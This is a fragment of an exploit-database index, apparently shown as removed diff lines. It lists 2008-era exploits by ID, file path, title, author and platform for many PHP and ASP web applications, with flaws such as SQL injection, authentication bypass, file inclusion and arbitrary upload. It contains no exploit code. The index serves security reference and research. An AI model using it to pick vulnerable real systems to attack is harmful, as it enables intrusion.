-6968,exploits/php/webapps/6968.txt,"Acc Autos 4.0 - Insecure Cookie Handling",2008-11-03,x0r,php,webapps, -6969,exploits/php/webapps/6969.txt,"Apoll 0.7b - Authentication Bypass",2008-11-03,ZoRLu,php,webapps, -6971,exploits/php/webapps/6971.txt,"MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting",2008-11-03,Hakxer,php,webapps, -6972,exploits/php/webapps/6972.txt,"pppBlog 0.3.11 - File Disclosure",2008-11-03,JosS,php,webapps, -6973,exploits/php/webapps/6973.txt,"TBmnetCMS 1.0 - Local File Inclusion",2008-11-04,d3v1l,php,webapps, -6974,exploits/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting",2008-11-04,G4N0K,php,webapps, -6975,exploits/php/webapps/6975.txt,"Joomla! Component VirtueMart Google Base 1.1 - Remote File Inclusion",2008-11-04,NoGe,php,webapps, -6976,exploits/php/webapps/6976.txt,"Joomla! Component ongumatimesheet20 4b - Remote File Inclusion",2008-11-04,NoGe,php,webapps, -6977,exploits/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection",2008-11-04,"Hussin X",php,webapps, -6978,exploits/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injections",2008-11-04,StAkeR,php,webapps, -6979,exploits/php/webapps/6979.txt,"nicLOR Puglia Landscape - Local File Inclusion",2008-11-04,StAkeR,php,webapps, -6980,exploits/php/webapps/6980.txt,"Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion",2008-11-04,d3v1l,php,webapps, -6981,exploits/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' SQL Injection",2008-11-04,Cyber-Zone,php,webapps, -6982,exploits/php/webapps/6982.txt,"CMS-School 2005 - 'showarticle.php' SQL Injection",2008-11-04,Cyber-Zone,php,webapps, -6983,exploits/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - Authentication Bypass",2008-11-04,Hakxer,php,webapps, -6984,exploits/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - Authentication Bypass",2008-11-04,Hakxer,php,webapps, -6985,exploits/php/webapps/6985.txt,"WEBBDOMAIN Quiz 1.02 - Authentication Bypass",2008-11-04,Hakxer,php,webapps, -6986,exploits/php/webapps/6986.txt,"WEBBDOMAIN Webshop 1.02 - Authentication Bypass",2008-11-04,Hakxer,php,webapps, -6987,exploits/php/webapps/6987.txt,"Simple Document Management System 1.1.4 - Authentication Bypass",2008-11-04,Yuri,php,webapps, -6988,exploits/php/webapps/6988.txt,"Tours Manager 1.0 - SQL Injection",2008-11-04,G4N0K,php,webapps, -6989,exploits/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - Authentication Bypass",2008-11-04,x0r,php,webapps, -6990,exploits/php/webapps/6990.txt,"nicLOR Sito - includefile Local File Inclusion",2008-11-04,StAkeR,php,webapps, -6991,exploits/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Authentication Bypass",2008-11-04,StAkeR,php,webapps, -6992,exploits/php/webapps/6992.txt,"wotw 5.0 - Local/Remote File Inclusion",2008-11-04,dun,php,webapps, -6993,exploits/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution",2008-11-04,"Charles Fol",php,webapps, -6995,exploits/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,php,webapps, -6996,exploits/php/webapps/6996.php,"PHPX 3.5.16 - 'news_id' SQL Injection",2008-11-05,StAkeR,php,webapps, -6997,exploits/php/webapps/6997.txt,"Pre Podcast Portal - SQL Injection",2008-11-05,G4N0K,php,webapps, -6998,exploits/php/webapps/6998.txt,"Pre Shopping Mall - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps, -6999,exploits/php/webapps/6999.txt,"PreProject Multi-Vendor Shopping Malls - Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps, -7000,exploits/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps, -7001,exploits/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps, -7002,exploits/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps, -7003,exploits/php/webapps/7003.txt,"PHP Auto Listings - 'pg' SQL Injection",2008-11-05,G4N0K,php,webapps, -7004,exploits/php/webapps/7004.txt,"Pre Simple CMS - Authentication Bypass",2008-11-05,"Hussin X",php,webapps, -7005,exploits/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps, -7007,exploits/php/webapps/7007.txt,"Harlandscripts drinks - 'recid' SQL Injection",2008-11-05,"Ex Tacy",php,webapps, -7008,exploits/php/webapps/7008.txt,"Pre Real Estate Listings - Authentication Bypass",2008-11-05,Cyber-Zone,php,webapps, -7009,exploits/php/webapps/7009.txt,"Mole Group Airline Ticket Script - SQL Injection",2008-11-05,InjEctOr5,php,webapps, -7010,exploits/php/webapps/7010.txt,"Mole Group Taxi Calc Dist Script - Authentication Bypass",2008-11-05,InjEctOr5,php,webapps, -7011,exploits/php/webapps/7011.pl,"Simple Machines Forum (SMF) 1.1.6 - Local File Inclusion / Code Execution",2008-11-05,~elmysterio,php,webapps, -7012,exploits/php/webapps/7012.txt,"hMAilServer 4.4.2 - 'PHPWebAdmin' File Inclusion",2008-11-06,Nine:Situations:Group,php,webapps, -7013,exploits/php/webapps/7013.txt,"DevelopItEasy Events Calendar 1.2 - Multiple SQL Injections",2008-11-06,InjEctOr5,php,webapps, -7014,exploits/php/webapps/7014.txt,"DevelopItEasy News And Article System 1.4 - SQL Injection",2008-11-06,InjEctOr5,php,webapps, -7015,exploits/php/webapps/7015.txt,"DevelopItEasy Membership System 1.3 - Authentication Bypass",2008-11-06,InjEctOr5,php,webapps, -7016,exploits/php/webapps/7016.txt,"DevelopItEasy Photo Gallery 1.2 - SQL Injection",2008-11-06,InjEctOr5,php,webapps, -7017,exploits/php/webapps/7017.txt,"Pre ADS Portal 2.0 - Authentication Bypass / Cross-Site Scripting",2008-11-06,G4N0K,php,webapps, -7018,exploits/php/webapps/7018.txt,"NICE FAQ Script - Authentication Bypass",2008-11-06,r45c4l,php,webapps, -7019,exploits/php/webapps/7019.txt,"Arab Portal 2.1 (Windows) - Remote File Disclosure",2008-11-06,"Khashayar Fereidani",php,webapps, -7020,exploits/php/webapps/7020.txt,"MySQL Quick Admin 1.5.5 - Local File Inclusion",2008-11-06,"Vinod Sharma",php,webapps, -7021,exploits/php/webapps/7021.txt,"SoftComplex PHP Image Gallery 1.0 - Authentication Bypass",2008-11-06,Cyber-Zone,php,webapps, -7022,exploits/php/webapps/7022.txt,"LoveCMS 1.6.2 Final - Arbitrary File Delete",2008-11-06,cOndemned,php,webapps, -7023,exploits/php/webapps/7023.txt,"DELTAScripts PHP Classifieds 7.5 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps, -7024,exploits/php/webapps/7024.txt,"DELTAScripts PHP Links 1.3 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps, -7025,exploits/php/webapps/7025.txt,"DELTAScripts PHP Shop 1.0 - Authentication Bypass",2008-11-06,ZoRLu,php,webapps, -7026,exploits/php/webapps/7026.txt,"SoftComplex PHP Image Gallery - 'ctg' SQL Injection",2008-11-06,"Hussin X",php,webapps, -7027,exploits/php/webapps/7027.txt,"Prozilla Software Directory - Cross-Site Scripting / SQL Injection",2008-11-06,G4N0K,php,webapps, -7028,exploits/php/webapps/7028.txt,"TurnkeyForms Entertainment Portal 2.0 - Insecure Cookie Handling",2008-11-07,G4N0K,php,webapps, -7029,exploits/php/webapps/7029.txt,"TurnkeyForms Business Survey Pro 1.0 - 'id' SQL Injection",2008-11-07,G4N0K,php,webapps, -7030,exploits/php/webapps/7030.txt,"Mole Group Pizza - 'manufacturers_id' SQL Injection",2008-11-07,InjEctOr5,php,webapps, -7031,exploits/php/webapps/7031.php,"e-Vision CMS 2.0.2 - Multiple Local File Inclusions",2008-11-07,StAkeR,php,webapps, -7032,exploits/php/webapps/7032.txt,"U&M Software Signup 1.1 - Authentication Bypass",2008-11-07,G4N0K,php,webapps, -7033,exploits/php/webapps/7033.txt,"U&M Software JustBookIt 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps, -7034,exploits/php/webapps/7034.txt,"U&M Software Event Lister 1.0 - Authentication Bypass",2008-11-07,G4N0K,php,webapps, -7035,exploits/php/webapps/7035.txt,"TurnkeyForms Local Classifieds - Cross-Site Scripting / SQL Injection",2008-11-07,TR-ShaRk,php,webapps, -7038,exploits/php/webapps/7038.txt,"Joomla! Component ClickHeat 1.0.1 - Multiple Remote File Inclusions",2008-11-07,NoGe,php,webapps, -7039,exploits/php/webapps/7039.txt,"Joomla! Component Recly!Competitions 1.0.0 - Multiple Remote File Inclusions",2008-11-07,NoGe,php,webapps, -7040,exploits/php/webapps/7040.txt,"Joomla! Component Feederator 1.0.5 - Multiple Remote File Inclusions",2008-11-07,NoGe,php,webapps, -7041,exploits/php/webapps/7041.txt,"E-topbiz Online Store 1 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps, -7042,exploits/php/webapps/7042.txt,"PHP Auto Listings Script - Authentication Bypass",2008-11-07,r45c4l,php,webapps, -7043,exploits/php/webapps/7043.txt,"Mole Group Rental Script - Authentication Bypass",2008-11-07,Cyber-Zone,php,webapps, -7044,exploits/php/webapps/7044.txt,"MyioSoft Ajax Portal 3.0 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps, -7045,exploits/php/webapps/7045.txt,"MyioSoft EasyBookMarker 4.0 - Authentication Bypass",2008-11-07,ZoRLu,php,webapps, -7046,exploits/php/webapps/7046.txt,"MyioSoft EasyCalendar - Authentication Bypass",2008-11-07,ZoRLu,php,webapps, -7047,exploits/php/webapps/7047.txt,"DELTAScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps, -7048,exploits/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,php,webapps, -7049,exploits/php/webapps/7049.txt,"Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting",2008-11-07,ahmadbady,php,webapps, -7050,exploits/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",php,webapps, -7052,exploits/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps, -7053,exploits/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - 'Parent' SQL Injection",2008-11-07,G4N0K,php,webapps, -7057,exploits/php/webapps/7057.pl,"MemHT Portal 4.0 - Remote Code Execution",2008-11-08,Ams,php,webapps, -7058,exploits/php/webapps/7058.txt,"zeeproperty 1.0 - Arbitrary File Upload / Cross-Site Scripting",2008-11-08,ZoRLu,php,webapps, -7059,exploits/php/webapps/7059.txt,"Enthusiast 3.1.4 - 'show_joined.php' Remote File Inclusion",2008-11-08,BugReport.IR,php,webapps, -7061,exploits/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Authentication Bypass",2008-11-08,d3b4g,php,webapps, -7062,exploits/php/webapps/7062.txt,"Zeeways ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps, -7063,exploits/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps, -7064,exploits/php/webapps/7064.pl,"Mambo Component n-form - 'form_id' Blind SQL Injection",2008-11-08,boom3rang,php,webapps, -7065,exploits/php/webapps/7065.txt,"Cyberfolio 7.12.2 - 'theme' Local File Inclusion",2008-11-08,dun,php,webapps, -7066,exploits/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass (1)",2008-11-08,G4N0K,php,webapps, -7067,exploits/asp/webapps/7067.txt,"DigiAffiliate 1.4 - Authentication Bypass",2008-11-08,d3b4g,asp,webapps, -7068,exploits/php/webapps/7068.txt,"Mole Group Airline Ticket Script - Authentication Bypass",2008-11-08,Cyber-Zone,php,webapps, -7069,exploits/php/webapps/7069.txt,"V3 Chat Live Support 3.0.4 - Insecure Cookie Handling",2008-11-08,Cyber-Zone,php,webapps, -7070,exploits/php/webapps/7070.txt,"Zeeways PHOTOVIDEOTUBE 1.1 - Authentication Bypass",2008-11-08,Stack,php,webapps, -7071,exploits/php/webapps/7071.txt,"ExoPHPDesk 1.2 Final - Authentication Bypass",2008-11-09,Cyber-Zone,php,webapps, -7072,exploits/php/webapps/7072.txt,"ZEEMATRI 3.0 - 'adid' SQL Injection",2008-11-09,"Hussin X",php,webapps, -7074,exploits/php/webapps/7074.txt,"X10media Mp3 Search Engine 1.6 - Remote File Disclosure",2008-11-09,THUNDER,php,webapps, -7075,exploits/jsp/webapps/7075.txt,"Openfire Server 3.6.0a - Authentication Bypass / SQL Injection / Cross-Site Scripting",2008-11-09,"Andreas Kurtz",jsp,webapps, -7076,exploits/php/webapps/7076.txt,"Collabtive 0.4.8 - Cross-Site Scripting / Authentication Bypass / Arbitrary File Upload",2008-11-10,USH,php,webapps, -7077,exploits/php/webapps/7077.txt,"OTManager CMS 2.4 - 'Tipo' Remote File Inclusion",2008-11-10,Colt7r,php,webapps, -7078,exploits/php/webapps/7078.txt,"Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection",2008-11-10,boom3rang,php,webapps, -7079,exploits/php/webapps/7079.txt,"FREEsimplePHPGuestbook - 'Guestbook.php' Remote Code Execution",2008-11-10,GoLd_M,php,webapps, -7080,exploits/php/webapps/7080.txt,"fresh email script 1.0 - Multiple Vulnerabilities",2008-11-10,Don,php,webapps, -7081,exploits/php/webapps/7081.txt,"AJ Article 1.0 - Remote Authentication Bypass",2008-11-10,G4N0K,php,webapps, -7082,exploits/php/webapps/7082.txt,"PHPStore Car Dealers - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps, -7083,exploits/php/webapps/7083.txt,"PHPStore PHP Job Search Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps, -7084,exploits/php/webapps/7084.txt,"PHPStore Complete Classifieds Script - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps, -7085,exploits/php/webapps/7085.txt,"PHPStore Real Estate - Arbitrary File Upload",2008-11-10,ZoRLu,php,webapps, -7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,php,webapps, -7087,exploits/php/webapps/7087.txt,"AJ Auction - Authentication Bypass",2008-11-10,G4N0K,php,webapps, -7089,exploits/php/webapps/7089.txt,"Aj Classifieds - Authentication Bypass",2008-11-11,G4N0K,php,webapps, -7092,exploits/php/webapps/7092.txt,"Joomla! Component com_books - 'book_id' SQL Injection",2008-11-11,boom3rang,php,webapps, -7093,exploits/php/webapps/7093.txt,"Joomla! Component Contact Info 1.0 - SQL Injection",2008-11-11,boom3rang,php,webapps, -7094,exploits/php/webapps/7094.txt,"Pre Real Estate Listings - Arbitrary File Upload",2008-11-11,BackDoor,php,webapps, -7095,exploits/php/webapps/7095.txt,"Joomla! / Mambo Component com_catalogproduction - 'id' SQL Injection",2008-11-11,boom3rang,php,webapps, -7096,exploits/php/webapps/7096.txt,"Joomla! Component Simple RSS Reader 1.0 - Remote File Inclusion",2008-11-11,NoGe,php,webapps, -7097,exploits/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps, -7098,exploits/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps, -7101,exploits/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,php,webapps, -7102,exploits/php/webapps/7102.txt,"Alstrasoft Article Manager Pro 1.6 - Authentication Bypass",2008-11-12,ZoRLu,php,webapps, -7103,exploits/php/webapps/7103.txt,"Alstrasoft Web Host Directory - Authentication Bypass",2008-11-12,ZoRLu,php,webapps, -7105,exploits/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",php,webapps, -7106,exploits/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps, -7107,exploits/php/webapps/7107.txt,"TurnkeyForms Web Hosting Directory - Multiple Vulnerabilities",2008-11-12,G4N0K,php,webapps, -7110,exploits/php/webapps/7110.txt,"ScriptsFeed (SF) Real Estate Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps, -7111,exploits/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps, -7112,exploits/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps, -7113,exploits/php/webapps/7113.txt,"BandSite CMS 1.1.4 - Insecure Cookie Handling",2008-11-13,Stack,php,webapps, -7114,exploits/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection / Code Execution",2008-11-13,Ams,php,webapps, -7116,exploits/php/webapps/7116.txt,"Alstrasoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps, -7117,exploits/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps, -7118,exploits/php/webapps/7118.txt,"TurnkeyForms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,php,webapps, -7119,exploits/php/webapps/7119.php,"Discuz! 6.x/7.x - Remote Code Execution",2008-11-14,80vul,php,webapps, -7120,exploits/asp/webapps/7120.txt,"Bankoi Webhost Panel 1.20 - Authentication Bypass",2008-11-14,R3d-D3V!L,asp,webapps, -7121,exploits/php/webapps/7121.pl,"SlimCMS 1.0.0 - 'edit.php' SQL Injection",2008-11-14,StAkeR,php,webapps, -7122,exploits/php/webapps/7122.txt,"GS Real Estate Portal - Multiple SQL Injections",2008-11-14,InjEctOr5,php,webapps, -7123,exploits/php/webapps/7123.txt,"X7 Chat 2.0.5 - Authentication Bypass",2008-11-14,ZoRLu,php,webapps, -7124,exploits/php/webapps/7124.txt,"TurnkeyForms Text Link Sales - 'id' Cross-Site Scripting / SQL Injection",2008-11-14,ZoRLu,php,webapps, -7128,exploits/php/webapps/7128.txt,"ClipShare Pro 2006-2007 - 'chid' SQL Injection",2008-11-15,snakespc,php,webapps, -7130,exploits/php/webapps/7130.php,"Minigal b13 - Remote File Disclosure",2008-11-15,"Alfons Luja",php,webapps, -7131,exploits/php/webapps/7131.txt,"yahoo answers - 'id' SQL Injection",2008-11-16,snakespc,php,webapps, -7133,exploits/php/webapps/7133.txt,"FloSites Blog - Multiple SQL Injections",2008-11-16,Vrs-hCk,php,webapps, -7134,exploits/php/webapps/7134.txt,"PHPstore Wholesale - 'id' SQL Injection",2008-11-16,"Hussin X",php,webapps, -7136,exploits/php/webapps/7136.txt,"mxCamArchive 2.2 - Bypass Configuration Download",2008-11-17,ahmadbady,php,webapps, -7137,exploits/asp/webapps/7137.txt,"OpenASP 3.0 - Blind SQL Injection",2008-11-17,StAkeR,asp,webapps, -7138,exploits/php/webapps/7138.txt,"E-topbiz ADManager 4 - 'group' Blind SQL Injection",2008-11-17,"Hussin X",php,webapps, -7140,exploits/php/webapps/7140.txt,"FREEze Greetings 1.0 - Remote Password Retrieve",2008-11-17,cOndemned,php,webapps, -7141,exploits/asp/webapps/7141.txt,"Q-Shop 3.0 - Cross-Site Scripting / SQL Injection",2008-11-17,Bl@ckbe@rD,asp,webapps, -7143,exploits/php/webapps/7143.txt,"PHPfan 3.3.4 - 'init.php' Remote File Inclusion",2008-11-17,ahmadbady,php,webapps, -7144,exploits/php/webapps/7144.txt,"Jadu Galaxies - 'categoryId' Blind SQL Injection",2008-11-17,ZoRLu,php,webapps, -7146,exploits/php/webapps/7146.txt,"Simple Customer 1.2 - Authentication Bypass",2008-11-17,d3b4g,php,webapps, -7147,exploits/php/webapps/7147.txt,"SaturnCMS - Blind SQL Injection",2008-11-17,"Hussin X",php,webapps, -7148,exploits/php/webapps/7148.txt,"Ultrastats 0.2.144/0.3.11 - 'serverid' SQL Injection",2008-11-17,eek,php,webapps, -7149,exploits/php/webapps/7149.php,"VideoScript 4.0.1.50 - Change Admin Password",2008-11-17,G4N0K,php,webapps, -7152,exploits/php/webapps/7152.txt,"MusicBox 2.3.8 - 'viewalbums.php' SQL Injection",2008-11-18,snakespc,php,webapps, -7153,exploits/php/webapps/7153.txt,"Pluck CMS 4.5.3 - 'g_pcltar_lib_dir' Local File Inclusion",2008-11-18,DSecRG,php,webapps, -7155,exploits/php/webapps/7155.txt,"Free Directory Script 1.1.1 - 'API_HOME_DIR' Remote File Inclusion",2008-11-18,"Ghost Hacker",php,webapps, -7156,exploits/php/webapps/7156.txt,"E-topbiz Link Back Checker 1 - Insecure Cookie Handling",2008-11-18,x0r,php,webapps, -7157,exploits/php/webapps/7157.txt,"Alex News-Engine 1.5.1 - Arbitrary File Upload",2008-11-19,Batter,php,webapps, -7158,exploits/php/webapps/7158.txt,"Alex Article-Engine 1.3.0 - 'FCKeditor' Arbitrary File Upload",2008-11-19,Batter,php,webapps, -7159,exploits/php/webapps/7159.php,"PunBB (Private Messaging System 1.2.x) - Multiple Local File Inclusions",2008-11-19,StAkeR,php,webapps, -7160,exploits/php/webapps/7160.php,"MyTopix 1.3.0 - SQL Injection",2008-11-19,cOndemned,php,webapps, -7162,exploits/php/webapps/7162.pl,"MauryCMS 0.53.2 - Arbitrary File Upload",2008-11-19,StAkeR,php,webapps, -7163,exploits/php/webapps/7163.txt,"RevSense 1.0 - Authentication Bypass",2008-11-19,d3b4g,php,webapps, -7164,exploits/php/webapps/7164.txt,"Pre Job Board - Authentication Bypass",2008-11-19,R3d-D3V!L,php,webapps, -7165,exploits/php/webapps/7165.pl,"wPortfolio 0.3 - Arbitrary File Upload",2008-11-19,Osirys,php,webapps, -7166,exploits/php/webapps/7166.txt,"AskPert - Authentication Bypass",2008-11-19,TR-ShaRk,php,webapps, -7168,exploits/php/webapps/7168.pl,"PunBB Mod PunPortal 0.1 - Local File Inclusion",2008-11-20,StAkeR,php,webapps, -7170,exploits/php/webapps/7170.php,"wPortfolio 0.3 - Admin Password Changing",2008-11-20,G4N0K,php,webapps, -7172,exploits/php/webapps/7172.txt,"Natterchat 1.1 - Authentication Bypass",2008-11-20,Bl@ckbe@rD,php,webapps, -7173,exploits/php/webapps/7173.php,"PHP-Fusion 7.00.1 - 'messages.php' SQL Injection",2008-11-20,irk4z,php,webapps, -7174,exploits/php/webapps/7174.txt,"vBulletin 3.7.3 - Visitor Message Cross-Site Request Forgery / Worm",2008-11-20,Mx,php,webapps, -7175,exploits/php/webapps/7175.txt,"Natterchat 1.12 - Authentication Bypass",2008-11-20,Stack,php,webapps, -7176,exploits/php/webapps/7176.txt,"ToursManager - 'tourview.php' Blind SQL Injection",2008-11-20,XaDoS,php,webapps, -7179,exploits/php/webapps/7179.txt,"Natterchat 1.1 - Remote Authentication Bypass",2008-11-20,Stack,php,webapps, -7180,exploits/php/webapps/7180.txt,"VCalendar - Remote Database Disclosure",2008-11-20,Swan,php,webapps, -7182,exploits/php/webapps/7182.txt,"Joomla! Component Thyme 1.0 - SQL Injection",2008-11-21,"Ded MustD!e",php,webapps, -7184,exploits/php/webapps/7184.txt,"e107 Plugin ZoGo-Shop 1.15.4 - 'product' SQL Injection",2008-11-22,NoGe,php,webapps, -7185,exploits/php/webapps/7185.php,"Discuz! - Remote Reset User Password",2008-11-22,80vul,php,webapps, -7186,exploits/php/webapps/7186.txt,"Vlog System 1.1 - SQL Injection",2008-11-22,Mr.SQL,php,webapps, -7188,exploits/php/webapps/7188.txt,"getaphpsite Real Estate - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps, -7189,exploits/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps, -7190,exploits/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps, -7191,exploits/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps, -7195,exploits/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' SQL Injection",2008-11-23,snakespc,php,webapps, -7197,exploits/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps, -7198,exploits/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - SQL Injection",2008-11-23,snakespc,php,webapps, -7199,exploits/php/webapps/7199.txt,"Netartmedia Blog System - SQL Injection",2008-11-23,snakespc,php,webapps, -7200,exploits/php/webapps/7200.txt,"PG Real Estate - Authentication Bypass",2008-11-23,ZoRLu,php,webapps, -7201,exploits/php/webapps/7201.txt,"Pilot Group PG Roommate Finder Solution - Authentication Bypass",2008-11-23,ZoRLu,php,webapps, -7202,exploits/php/webapps/7202.txt,"PG Job Site - Blind SQL Injection",2008-11-23,ZoRLu,php,webapps, -7204,exploits/php/webapps/7204.txt,"MODx CMS 0.9.6.2 - Remote File Inclusion / Cross-Site Scripting",2008-11-23,RoMaNcYxHaCkEr,php,webapps, -7205,exploits/php/webapps/7205.txt,"Goople CMS 1.7 - Insecure Cookie Handling",2008-11-23,BeyazKurt,php,webapps, -7206,exploits/php/webapps/7206.txt,"PHP Classifieds Script - Remote Database Disclosure",2008-11-23,InjEctOr5,php,webapps, -7208,exploits/php/webapps/7208.txt,"Netartmedia Real Estate Portal 1.2 - 'ad_id' SQL Injection",2008-11-24,"Hussin X",php,webapps, -7210,exploits/php/webapps/7210.txt,"Goople CMS 1.7 - Arbitrary Code Execution",2008-11-24,x0r,php,webapps, -7211,exploits/php/webapps/7211.php,"VideoScript 3.0 < 4.0.1.50 - 'Official' Shell Injection",2008-11-24,G4N0K,php,webapps, -7212,exploits/php/webapps/7212.php,"VideoScript 3.0 < 4.1.5.55 - 'Unofficial' Shell Injection",2008-11-24,G4N0K,php,webapps, -7214,exploits/php/webapps/7214.txt,"ftpzik - Cross-Site Scripting / Local File Inclusion",2008-11-24,JIKO,php,webapps, -7215,exploits/php/webapps/7215.txt,"Bandwebsite 1.5 - SQL Injection / Cross-Site Scripting",2008-11-24,ZoRLu,php,webapps, -7216,exploits/php/webapps/7216.txt,"WebStudio CMS - Blind SQL Injection",2008-11-24,"Glafkos Charalambous",php,webapps, -7217,exploits/php/webapps/7217.pl,"Quicksilver Forums 1.4.2 (Windows) - Remote Code Execution",2008-11-24,girex,php,webapps, -7218,exploits/php/webapps/7218.txt,"Nitrotech 0.0.3a - Remote File Inclusion / SQL Injection",2008-11-24,Osirys,php,webapps, -7221,exploits/php/webapps/7221.txt,"Pie Web M{a_e}sher 0.5.3 - Multiple Remote File Inclusions",2008-11-24,NoGe,php,webapps, -7222,exploits/php/webapps/7222.txt,"WebStudio eHotel - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps, -7223,exploits/php/webapps/7223.txt,"WebStudio eCatalogue - Blind SQL Injection",2008-11-25,"Hussin X",php,webapps, -7224,exploits/php/webapps/7224.txt,"FAQ Manager 1.2 - 'categorie.php' SQL Injection",2008-11-25,cOndemned,php,webapps, -7225,exploits/php/webapps/7225.txt,"Pie Web m{a_e}sher mod rss 0.1 - Remote File Inclusion",2008-11-25,ZoRLu,php,webapps, -7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps, -7228,exploits/php/webapps/7228.txt,"Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting",2008-11-25,ZoRLu,php,webapps, -7229,exploits/php/webapps/7229.txt,"FAQ Manager 1.2 - 'header.php' Remote File Inclusion",2008-11-25,ZoRLu,php,webapps, -7230,exploits/php/webapps/7230.pl,"Clean CMS 1.5 - Blind SQL Injection",2008-11-25,JosS,php,webapps, -7231,exploits/php/webapps/7231.txt,"Fuzzylime CMS 3.03 - 'track.php' Local File Inclusion",2008-11-25,"Alfons Luja",php,webapps, -7232,exploits/php/webapps/7232.txt,"SimpleBlog 3.0 - Database Disclosure",2008-11-25,EL_MuHaMMeD,php,webapps, -7233,exploits/php/webapps/7233.txt,"LoveCMS 1.6.2 Final (Download Manager 1.0) - Arbitrary File Upload",2008-11-25,cOndemned,php,webapps, -7234,exploits/php/webapps/7234.txt,"VideoGirls BiZ - Blind SQL Injection",2008-11-25,Cyber-Zone,php,webapps, -7235,exploits/php/webapps/7235.txt,"Jamit Job Board 3.x - Blind SQL Injection",2008-11-25,XaDoS,php,webapps, -40987,exploits/php/webapps/40987.txt,"My Click Counter 1.0 - Authentication Bypass",2017-01-03,Adam,php,webapps, -7237,exploits/php/webapps/7237.txt,"CMS Ortus 1.13 - SQL Injection",2008-11-26,otmorozok428,php,webapps, -7238,exploits/php/webapps/7238.txt,"Post Affiliate Pro 3 - 'umprof_status' Blind SQL Injection",2008-11-26,XaDoS,php,webapps, -7239,exploits/php/webapps/7239.txt,"ParsBlogger - 'blog.asp' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps, -7240,exploits/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps, -7241,exploits/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - Local File Inclusion",2008-11-27,"CWH Underground",php,webapps, 